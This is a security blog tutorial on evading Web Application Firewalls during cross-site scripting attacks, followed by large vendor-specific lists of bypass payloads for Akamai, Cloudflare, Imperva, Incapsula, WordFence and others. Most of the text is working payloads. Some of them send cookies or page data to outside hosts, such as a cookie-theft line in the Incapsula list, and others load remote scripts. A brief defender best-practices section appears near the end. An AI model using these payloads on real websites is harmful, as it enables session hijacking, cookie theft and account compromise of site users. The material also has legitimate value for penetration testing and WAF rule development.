Hey Folks 🙂 !! In this tutorial, we will describe some of the techniques commonly used by hackers to bypass Web Application Firewalls (WAF) during XSS exploitation.
Let’s See 🙂 !!
Introduction Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we’ll explore some techniques used to bypass WAFs and execute XSS payloads successfully.
Understanding XSS and WAFs Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.
WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.
Common WAF Bypass Techniques
- Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through.
1 | <img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/"> |
- Using Alternate Event Handlers: WAFs may specifically filter common event handlers like
onload
oronerror
. Attackers can use less common event handlers that may not be included in the WAF’s rule set.
1 | <div style="width:expression(alert(1))"></div> |
- Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.
1 | <script>/*</script><svg onload=alert(1)>*/ |
- Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety.
1 | <img src='1' onerror='ja'+'vascript:alert(1)'> |
- Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF’s inspection process.
1 2 3 4 | GET / HTTP/1.1 Host: victim.com Content-Length: 0 X-Forwarded-For: '><script>alert(1)</script> |
Now let’s have a look some waf bypass pyaloads 🙂 !!
Akamai XSS Payloads
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`> <marquee+loop=1+width=0+onfinish='new+Function`al\ert`1``'> <svg><circle><set onbegin=prompt(1) attributename=fill> <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> "%3balert`1`%3b" asd"`> onpointerenter=x=prompt,x`XSS` <x onauxclick=import('//1152848220/')>click <x onauxclick=a=alert,a(domain)>click -@niksthehacker <x onauxclick=import('//1152848220/')>click <x onauxclick=import('//xss/')>click \"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss {{constructor.constructor(alert`1`)()}} javascript:new%20Function`al\ert`1``; https://twitter.com/xhzeem/status/1378316651431612422 https://twitter.com/xhzeem/status/1377992310974218245 <script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-scripting/cheat-sheet "><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click -@stealthybugs |
Cloudflare XSS payloads
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | <a"/onclick=(confirm)()>Click Here! Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a> <--%253cimg%20onerror=alert(1)%20src=a%253e --!> <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> javascript:{ alert`0` } 1'"><img/src/onerror=.1|alert``> <img src=x onError=import('//1152848220/')> %2sscript%2ualert()%2s/script%2u <svg on onload=(alert)(document.domain)> <img ignored=() src=x onerror=prompt(1)> <svg onx=() onload=(confirm)(1)> “><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041; <svg on =i onload=alert(domain) (working) <svg/onload=location/**/='https://your.server/'+document.domain> <svg onx=() onload=window.alert?.()> (working) test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic "onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic "><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan %27%09);%0d%0a%09%09[1].find(alert)// "><img src=1 onmouseleave=print()> - @itsgeekymonk <svg on onload=(alert)(document.domain)> -@zapstiko <svg/on%20onload=alert(1)> (working) -@aufzayed <img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi |
Cloudfront XSS payloads
1 2 3 4 | ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'> ">'><details/open/ontoggle=confirm('XSS')> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ "><img src=x onerror=confirm(1);> |
Imperva XSS payloads
1 2 3 4 5 6 7 8 | <x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly) tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded) <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads <svg onload\r\n=$.globalEval("al"+"ert()");> <bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap |
Incapsula XSS payloads
1 2 3 4 5 6 7 8 9 10 11 12 | <iframe/onload='this["src"]="javas	cript:al"+"ert``"';> <iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a"> <audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x> <img/src=q onerror='new Function`al\ert`1``'> <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> <svg onload\r\n=$.globalEval("al"+"ert()");> [1].map(alert) or (alert)(1) <"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX</a> [1].find(confirm) <svg/onload=self[`aler`%2b`t`]`1`> %22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E '-[document.domain].map(alert)-' |
WordFence XSS payloads
1 2 3 4 5 6 7 | ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli <meter onmouseover="alert(1)" -@manjith27945363 '">><div><meter onmouseover="alert(1)"</div>" -@manjith27945363 >><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363 Wordfence 7.4.2 <a href=javascript:alert(1)> -@brutelogic <a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a> |
Best Practices for Defenders While understanding how attackers bypass WAFs is crucial, it’s equally important for defenders to continuously update WAF rules, employ multiple layers of security, and conduct regular security assessments.
- Regular Updates: Keep WAF signatures and rules up-to-date to cover new and emerging threats.
- Defense-in-Depth: Utilize a combination of security mechanisms (e.g., input validation, Content Security Policy) alongside the WAF for better protection.
- Security Testing: Regularly perform penetration testing and security assessments to identify and patch any vulnerabilities that could be exploited.
Conclusion Bypassing a WAF with XSS payloads requires creativity and a deep understanding of both the WAF’s limitations and the web application itself. While WAFs provide a strong line of defense, they should not be solely relied upon. A layered security approach combined with continuous monitoring and testing is essential to defend against these sophisticated attacks.
Additionally 🙂 !! If you are a beginner and having some difficulty understanding XSS vulnerabilities in depth, you can visit here
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.